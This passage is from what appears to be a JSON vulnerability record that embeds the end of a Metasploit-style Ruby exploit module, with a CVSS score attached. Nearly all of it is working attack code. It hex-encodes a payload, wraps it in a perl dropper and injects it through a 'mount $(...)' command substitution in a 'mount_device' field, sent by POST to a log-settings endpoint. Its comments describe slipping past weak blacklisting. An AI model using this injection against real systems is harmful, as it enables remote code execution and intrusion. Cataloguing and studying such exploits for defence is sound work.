here.\n # It's so buggy to make the cmd payloads work under the following circumstances (Weak blacklisting, double escaping etc)\n # For that reason, I am planting our payload dropper within the perl command.\n\n cmd = \"python -c \\\"#{payload.encoded}\\\"\"\n final_payload = cmd.to_s.unpack1('H*')\n p = \"perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'\"\n\n vars_post = {\n mount_device: \"mount $(#{p}) /var/offload\",\n cmd: 'mount'\n }\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),\n 'cookie' => \"JSESSIONID=#{@jsessionid}\",\n 'ctype' => 'application/json',\n 'data' => vars_post.to_json\n })\n end\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
